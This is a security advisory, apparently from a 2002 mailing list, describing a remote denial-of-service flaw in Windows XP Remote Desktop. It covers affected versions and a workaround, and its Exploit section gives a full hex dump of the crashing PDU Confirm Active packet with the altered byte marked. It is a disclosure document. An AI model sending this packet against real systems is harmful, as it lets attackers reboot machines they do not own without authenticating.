Vulnerable

Microsoft Windows XP Professional
Microsoft Windows .NET Standard Server Beta 3

Non-vulnerable

Microsoft Windows 2000 Server

Background

Windows XP Professional has a remote denial of service attack when Remote
Desktop is enabled. Remote Desktop is XP Professional's single-user RDP
server (Terminal Services).

Discussion

At the start of the protocol there is a negotiation of client and server
graphics capabilities, in a packet called PDU Confirm Active. A block of
32 bytes in this packet allows the client to disable the drawing commands
that it does not support.

One of these apparently controls whether the Pattern BLT command is sent.
On Windows 2000 Server, disabling this command will make the server send
bitmaps instead of Pattern BLT commands. However, Windows XP Professional
apparently reboots when it tries to render patterns; since this happens
while the login screen is being drawn, this does not require the client to
have logged on or authenticated to the server. This applies to all
versions of the protocol tested (RDP 4.0, 5.0 and 5.1), and it is also
reproducible with Windows .NET Standard Server Beta 3.

Workaround

Disable Remote Desktop (from Control Panel, System, Remote, Remote
Desktop, deselect the option "Allow users to connect remotely to this
computer").

Exploit

Shown below is the unencrypted packet contents for the problematic PDU
Confirm Active packet. The only change is from 01 to 00 on the line
indicated.

c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- was "2a 00 01 01"
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01

References

Section 8.2.5 from T.128 Multipoint application sharing, Series T: Terminals
for telematic services, ITU-T.

Microsoft was notified on 16 April 2002.

Credits

Ben Cohen
ben.cohenskygate.co.uk

Skygate Technology Ltd.
http://www.skygate.co.uk/
+44 (0)20 8542 7856

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]